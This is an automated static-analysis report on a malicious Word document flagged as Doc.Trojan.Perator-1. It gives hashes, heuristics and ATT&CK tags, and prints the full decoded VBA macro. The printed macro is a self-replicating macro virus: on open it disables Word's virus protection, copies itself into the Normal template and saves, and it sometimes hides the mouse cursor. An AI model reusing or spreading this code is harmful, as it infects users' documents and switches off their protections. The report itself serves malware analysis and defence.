Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 60795749b72824eb…

MALICIOUS

Office (OLE)

36.0 KB Created: 1999-07-06 22:55:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: ef7ca5e57ea4589644e8ea2ff1ec3d6c SHA-1: 63294ca8d2fa2b208f45159528c302e7219e007f SHA-256: 60795749b72824ebc6b8a446021dabe148991b0ee6dd9515128a4a153bce674b
122 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to display a fake document summary dialog with the title 'bHAK 31337 oPERATOR/rUNE wAS hERE' and includes the URL 'http://lz0vx.cjb.net' in its keywords. This suggests the macro's purpose is to lure the user into enabling malicious content, likely to download and execute a secondary payload. The ClamAV detection as 'Doc.Trojan.Perator-1' further supports its malicious nature.

Heuristics 4

  • ClamAV: Doc.Trojan.Perator-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Perator-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://lz0vx.cjb.net9 In document text (OLE body)
    • http://lz0vx.cjb.netIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3331 bytes
SHA-256: aa2858fd5ed8e92647ce213add9e968375ce44b99b0d56c0924cd006c9cb39f1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True





























                                                                            
                                                                            Private Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
                                                                            Private Sub Document_Open()
                                                                            On Error Resume Next: Set egger = MacroContainer: tappler = 2
                                                                            With Dialogs(wdDialogFileSummaryInfo): .Title = "bHAK 31337 oPERATOR/rUNE wAS hERE": .Author = "oPERATOR": .Keywords = "http://lz0vx.cjb.net": .Execute: End With
                                                                            SetAttr NormalTemplate.FullName, vbNormal: Options.SaveNormalPrompt = (Rnd * 0)
                                                                            Set walchensteiner = egger.VBProject: Options.VirusProtection = (Rnd * 0)
                                                                            Set laggner = walchensteiner.vbcomponents((tappler - 1)): Set gaggl = laggner.codemodule
                                                                            Set straubinger = NormalTemplate: bachler = gaggl.lines((tappler - 1), gaggl.countoflines)
                                                                            If egger = straubinger Then Set straubinger = ActiveDocument
                                                                            Set thalhammer = straubinger.VBProject.vbcomponents((tappler - 1)).codemodule
                                                                            If Right(thalhammer.lines((tappler * 26), (tappler - 1)), 27) <> "'bHAK 31337 - oPERATOR/rUNE" Then
                                                                            thalhammer.deletelines 1, thalhammer.countoflines
                                                                            thalhammer.addfromstring bachler
                                                                            If ActiveDocument.Saved = False Then ActiveDocument.SaveAs ActiveDocument.FullName
                                                                            End If
                                                                            If Day(Now()) = (tappler * (Int(Rnd * 15))) Then
                                                                            MsgBox "bLEED°rAKAtAKA", 0, "BHAK 31337"
                                                                            While ShowCursor(False) >= 0
                                                                            Wend
                                                                            End If
                                                                            End Sub
                                                                            'bHAK 31337 - oPERATOR/rUNE